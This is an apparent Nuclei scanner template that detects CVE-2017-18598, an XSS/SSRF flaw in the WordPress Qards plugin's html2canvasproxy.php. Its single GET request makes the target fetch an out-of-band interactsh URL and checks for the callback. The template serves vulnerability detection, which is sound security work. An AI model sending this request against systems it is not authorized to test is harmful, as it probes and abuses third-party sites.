nuclei-templates/http/cves/2017/CVE-2017-18598.yaml

44 lines
1.3 KiB
YAML

id: CVE-2017-18598
info:
name: WordPress Qards - Cross-Site Scripting
author: pussycat0x
severity: medium
description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.
reference:
- https://wpscan.com/vulnerability/8934
- https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
- https://wpvulndb.com/vulnerabilities/8934
- https://nvd.nist.gov/vuln/detail/CVE-2017-18598
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18598
cwe-id: CWE-79
epss-score: 0.00094
cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:*
epss-percentile: 0.38904
metadata:
max-request: 1
framework: wordpress
vendor: designmodo
product: qards
tags: wp-plugin,oast,wpscan,cve,cve2017,wordpress,ssrf,xss
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- "console.log"